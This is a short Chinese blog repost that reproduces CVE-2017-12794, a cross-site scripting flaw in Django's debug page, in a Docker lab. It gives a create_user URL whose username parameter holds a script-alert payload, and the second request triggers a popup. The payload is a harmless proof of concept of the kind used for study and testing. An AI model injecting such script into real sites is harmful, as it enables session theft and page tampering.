首页 > 其他 > 详细

Django debug page XSS漏洞(CVE-2017-12794)复现

时间:2020-09-01 19:20:05      阅读:70      评论:0      收藏:0      [点我收藏+]

参考:https://paper.seebug.org/402/

使用docker搭建环境

访问:http://your-ip:8000/create_user/?username=<script>alert(1)</script>

成功创建一个用户

技术分享图片

 

 再次访问  http://your-ip:8000/create_user/?username=<script>alert(1)</script>

触发弹窗

技术分享图片

 

 

Django debug page XSS漏洞(CVE-2017-12794)复现

原文:https://www.cnblogs.com/rnss/p/13597549.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!